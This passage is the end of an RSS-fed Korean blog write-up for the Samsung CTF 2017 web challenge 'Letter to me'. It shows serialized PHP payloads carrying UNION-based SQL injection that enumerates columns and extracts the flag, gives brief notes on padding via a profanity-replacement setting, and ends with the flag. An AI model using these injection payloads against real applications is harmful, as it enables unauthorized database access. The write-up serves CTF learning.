style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;f**k&quot;;s:13:&quot;attached_file&quot;;s:127:&quot;1 union select 1,(select column_name from information_schema.columns where table_name=0x4c544f4d5f466c3367 limit 0,1) limit 1,1&lt;/span&gt;&lt;/p&gt;&lt;br /&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.2;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;# flag&lt;/span&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.2;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;f**k&quot;;s:13:&quot;attached_file&quot;;s:68:&quot;1 union select 1,(select flag from LTOM_Fl3g limit 0,1) limit 1,1&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;위와 같이 msg부분에 입력해주고, 전체 길이만큼 dummy byte로 채워지도록 profanity_word_replace를 재설정 한 후 요청하면 각각에 해당하는 결과를 얻을 수 있다&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:700;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;FLAG : SCTF{Enj0y_y0ur_0nly_life}&lt;/span&gt;&lt;/p&gt;</description>
      <category>CTF/Samsung CTF 2017</category>
      <category>attack</category>
      <category>letter to me</category>
      <category>samsungctf</category>
      <category>sctf</category>
      <category>web</category>
      <author>Choiys</author>
      <guid isPermaLink="true">https://choiys.tistory.com/235</guid>
      <comments>https://choiys.tistory.com/entry/SCTF-2017-Attack-Letter-to-me300-pts#entry235comment</comments>
      <pubDate>Mon, 24 Jul 2017 11:47:46 +0900</pubDate>
    </item>
  </channel>
</rss>